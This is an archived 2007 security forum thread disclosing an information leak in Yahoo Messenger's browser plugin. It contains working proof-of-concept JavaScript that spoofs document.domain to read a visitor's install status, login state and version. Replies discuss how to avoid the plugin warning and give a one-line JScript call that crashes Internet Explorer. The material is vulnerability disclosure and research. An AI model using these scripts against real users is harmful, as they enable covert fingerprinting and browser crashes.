Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Yahoo Messenger information disclosure
Posted by: trev
Date: April 05, 2007 11:41AM

Yahoo Messenger installs a browser plugin called "Yahoo Application State Plugin" (npYState.dll). Purpose of this plugin is to tell Yahoo pages whether you have Yahoo Messenger installed, which version you have and whether you are currently logged in. Only yahoo.com is supposed to have access to this information, to ensure this the plugin tests document.domain property of the page that loaded it. However, at least in Firefox and Opera you can manipulate the value of document.domain to get access to the information from any web page:

<object id="npystate" type="application/x-vnd.yahoo.applicationState"></object>
<script type="text/javascript">
  var origDocument = document;
  try {
    document.__defineGetter__("domain", function(){return "yahoo.com"});
  } catch(e) {}
  try {
    window.document = {domain: "yahoo.com"};
  } catch(e) {}

  window.onload = function() {
    var info = origDocument.getElementById("npystate").applicationInfo("msgr");
    alert(info.installed() ? "Yahoo! Messenger is installed" : "Yahoo! Messenger is not installed");
    alert(info.isLoggedIn() ? "You are currently logged in" : "You are not logged in");

    var version = info.version();
    alert("Yahoo! Messenger version: " + version.major + "." + version.minor + "." + version.hiBuild + "." + version.loBuild);

    alert("Yahoo! Messenger locale: " + info.internationalCode());
  }
</script>

I suspect that some variation of this will work in Internet Explorer as well.



Edited 1 time(s). Last edit at 04/05/2007 12:11PM by trev.

Options: ReplyQuote
Re: Yahoo Messenger information disclosure
Posted by: rsnake
Date: April 05, 2007 06:16PM

I take it I have to have this installed for it to work? :) It just popped up a plugin error on this computer. Is there any way to suppress that error if it's not installed?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Yahoo Messenger information disclosure
Posted by: trev
Date: April 05, 2007 06:27PM

Yahoo checks navigator.plugins["Yahoo Application State Plugin"] before creating the object so it doesn't pop up any messages. But I didn't have Yahoo Messenger installed myself, have a copy of npYState.dll on my computer from the crash testing. Copy it into the plugins directory of the browser, create a few registry entries (Process Monitor shows you which ones it is looking for) and the plugin will report all the trash you will feed it. I can also send you YPagerChecker.dll (the ActiveX variation of the same thing) if you want to give it a try.



Edited 2 time(s). Last edit at 04/05/2007 06:33PM by trev.

Options: ReplyQuote
Re: Yahoo Messenger information disclosure
Posted by: rsnake
Date: April 05, 2007 10:27PM

It does give me the "Additional Plugins are required to display all the media on this page." error. The reason I'm asking if there is a way to suppress that is I am working on something to do detection of this sort of thing but it's super noisy if it fails (in this case with the warning).

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Yahoo Messenger information disclosure
Posted by: trev
Date: April 06, 2007 04:55AM

As I said, if navigator.plugins["Yahoo Application State Plugin"] is undefined then npYState.dll is not installed and you don't have to try - no warning then.

Options: ReplyQuote
Re: Yahoo Messenger information disclosure
Posted by: trev
Date: April 06, 2007 05:12AM

At least some result from my experiments with Internet Explorer:
new ActiveXObject("YPagerChecker.MessengerChecker");
This JScript code will crash the browser if Yahoo Messenger is installed (null pointer exception in YPagerChecker.dll).

Options: ReplyQuote


Sorry, only registered users may post in this forum.